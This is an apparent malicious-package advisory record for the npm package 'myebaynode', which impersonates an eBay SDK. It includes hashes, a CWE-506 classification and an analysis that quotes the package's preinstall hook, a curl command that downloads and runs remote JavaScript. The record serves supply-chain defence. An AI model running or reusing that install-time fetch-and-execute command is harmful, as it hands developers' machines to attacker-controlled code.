-= Per source details. Do not edit below this line.=-
package.json declares a preinstall lifecycle hook that runs 'curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js', fetching JavaScript from an external, mutable, personal domain and immediately executing it under the installer's user account on npm install. The fetched payload is unpinned (no hash or signature verification), can be changed by the host's owner at any time, and runs with full filesystem and network access of the installing user. The package name 'myebaynode' with description 'Ebay Node Package', version 99.0.0, and minimal metadata (author 'aman', no repository) suggest brand impersonation intended to lure developers searching for an eBay SDK.
{
"malicious-packages-origins": [
{
"sha256": "12d56c05672731322d45fb9273fb782a6b8042260fb019b2d96c755eed084fc3",
"id": "IN-MAL-2026-007197",
"source": "amazon-inspector",
"modified_time": "2026-06-23T14:09:56Z",
"versions": [
"99.0.0"
],
"import_time": "2026-06-23T14:23:02.347959934Z"
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/myebaynode/MAL-2026-6296.json"
[
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
}
]
{
"evidence_files": [
{
"sha256": "9f676970e07f2718ac80aa9f44598be95d67f13c8b6c06499c930a8074bbd8d0",
"tlsh": "a0e07d745d20117335c402e1cc2a9c4ed1925e3f0004380957db042c418eb7758ff31c",
"path": "package.json"
}
],
"package_integrity": [
{
"filename": "myebaynode-99.0.0.tgz",
"hashes": {
"sha1": "4c42f5e72fc606a33b23a9b9857d58193cf1ca74",
"sha512_sri": "sha512-r6POebR9Wes8FrM3bKz1a4x6l9hw6Iim/ve6olH19077JPm+r1A12dD9PrYfG6Id7ociquzcPUJU1VIp2FICYw=="
}
}
]
}